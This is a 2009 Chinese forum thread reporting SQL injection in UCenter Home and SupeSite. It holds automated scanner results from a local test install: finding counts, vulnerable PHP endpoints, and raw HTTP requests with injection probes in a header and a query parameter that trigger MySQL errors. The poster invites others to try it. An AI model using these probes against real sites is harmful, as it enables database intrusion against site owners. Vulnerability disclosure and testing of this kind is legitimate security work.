UCenter Home的MySql注入

yayamouse · 发表于 2009-12-15 15:21:58

本帖最后由 yayamouse 于 2009-12-15 17:43 编辑

SQL 盲注 64
SQL 注入 3
不充分帐户封锁 1
发现数据库错误模式 6
会话标识未更新 2
会话定置 2
基于 DOM 的跨站点脚本编制 1
可预测的登录凭证 1
跨站点脚本编制 8
使用 SQL 注入的认证旁路 1
有漏洞的 URL
URL 问题（类型）修复任务（类型）
http://127.0.0.1/ 3 (3) 3 (3)
http://127.0.0.1/com3/ 1 (1) 1 (1)
http://127.0.0.1/com2/ 1 (1) 1 (1)
http://127.0.0.1/com1/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/logs 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/.cobalt/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/www-sql/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/w3-msql/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/tools/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/templates/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/sws/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/suche/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/ssi/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/search/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/samples/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/rwcgi60/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/powerup/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/pollit/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/openwebmail/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/news/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/mwf/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/ikonboard/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/iisadmin/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/hwadmin5340/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/hamweather/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/gw5/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/guestbook/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/gbook/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/excite/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/ews/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/dcforum/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/dbman/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/dasp/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/cutecast/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/cssearch/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/csfaq/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/cgi-bin/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/cgi/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/carello/ 1 (1) 1 (1)
http://127.0.0.1/cgi-bin/calendar/ 1 (1) 1 (1)
http://127.0.0.1/aux/ 1 (1) 1 (1)
http://127.0.0.1/qc122/ 25 (3) 25 (3)
http://127.0.0.1/qc122/admincp.php 1 (1) 1 (1)
http://127.0.0.1/qc122/batch.common.php 3 (1) 3 (1)
http://127.0.0.1/qc122/batch.login.php 18 (10) 15 (7)
http://127.0.0.1/qc122/batch.panel.php 4 (3) 4 (3)
http://127.0.0.1/qc122/batch.postnews.php 1 (1) 1 (1)
http://127.0.0.1/qc122/batch.search.php 9 (5) 9 (3)
http://127.0.0.1/qc122/cp.php 21 (7) 19 (4)
http://127.0.0.1/qc122/do.php 10 (4) 10 (3)
http://127.0.0.1/qc122/index.php 2 (2) 2 (2)
http://127.0.0.1/qc122/space.php 4 (4) 4 (3)
http://127.0.0.1/qc122/home/ 1 (1) 1 (1)
http://127.0.0.1/qc122/home/api/uc.php 10 (4) 5 (2)
http://127.0.0.1/qc122/ucenter/ 1 (1) 1 (1)
http://127.0.0.1/qc122/ucenter/admin.php 3 (2) 3 (2)
http://127.0.0.1/qc122/bbs/ 1 (1) 1 (1)

yayamouse · 发表于 2009-12-15 15:23:34

SQL 盲注 (2/12)
受影响的 URL
 http://127.0.0.1/qc122/
 http://127.0.0.1/qc122/batch.common.php
 http://127.0.0.1/qc122/batch.login.php
 http://127.0.0.1/qc122/batch.panel.php
 http://127.0.0.1/qc122/batch.postnews.php
 http://127.0.0.1/qc122/batch.search.php
 http://127.0.0.1/qc122/cp.php
 http://127.0.0.1/qc122/do.php
 http://127.0.0.1/qc122/home/api/uc.php
 http://127.0.0.1/qc122/space.php

yayamouse · 发表于 2009-12-15 15:28:29

GET /qc122/home/api/uc.php?time=1260409586&code=5795GvVJczC4GNBAWZ6GDlXQbW7fjZuWwmTBjUtO3HTswNNPKZWg38guTotjRsVltm%252BPz6N2doCDB6euzA HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 127.0.0.1
X-Forwarded-For: %2527

HTTP/1.1 200 OK
Content-Length: 523
Date: Thu, 10 Dec 2009 05:36:28 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html

<div style="position:absolute;font-size:11px;font-family:verdana,arial;background:#EBEBEB;padding:0.5em;">
MySQL Error 
Message: Can not connect to MySQL server 
SQL: 
Error: Can't connect to MySQL server on 'localhost' (10048) 
Errno.: 2003 
<a href="http://faq.comsenz.com/?type=mysql&dberrno=2003&dberror=Can%27t%20connect%20to%20MySQL%20server%20on%20%27localhost%27%20%2810048%29" target="_blank">Click here to seek help.</a>
</div>

yayamouse · 发表于 2009-12-15 15:30:18

发送GET /qc122/batch.search.php?searchkey=1234&type=&searchname=subject&page=WF'SQL"Probe;A--B HTTP/1.0
Cookie: _refer=deleted; supe__refer=%252Fqc122%252Fadmincp.php; supe_sauth=deleted; supe_auth=4488dicNG9PxYjGCQgYGIaVMcWeizPo32dbrZNTf4eV592XmY8qWLhLV7r5IzBPTQQoLFTpvUHY4osTGAJjr; prF_auth=01daRiYxm8qnnQ6higa%2BN2CmgXuXt0wjEZnlLfJBKLWTL4pp3rML5%2B3UrUV98ggnT0hw1DOK%2BWOvDS7lo6xINg; prF_cookietime=2592000; supe_supe_refresh_items=0_4889_4897_4868_4863_4882; supe_seccode=f88ePHmz3VM87NUzakrLaMkcKwvez2lV5JnrPQxpTSV2; supe_sid=deleted
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 127.0.0.1
Referer: http://127.0.0.1/qc122/batch.search.php

返回

HTTP/1.1 200 OK
Content-Length: 600
Date: Thu, 10 Dec 2009 04:23:55 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html; charset=gbk

</table></table></table></table></table>
SupeSite info: MySQL Query Error 
 
User: admin 
Time: 2009-12-10 12:23pm 
Script: /qc122/batch.search.php 
 
SQL: SELECT * FROM [Table]spaceitems WHERE subject LIKE '%1234%' ORDER BY dateline DESC LIMIT -30,30 
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30,30' at line 1 
Errno.: 1064

yayamouse · 发表于 2009-12-15 15:30:36

大家可以试试

		自动登录	找回密码
密码			立即注册

[BUG] UCenter Home的MySql注入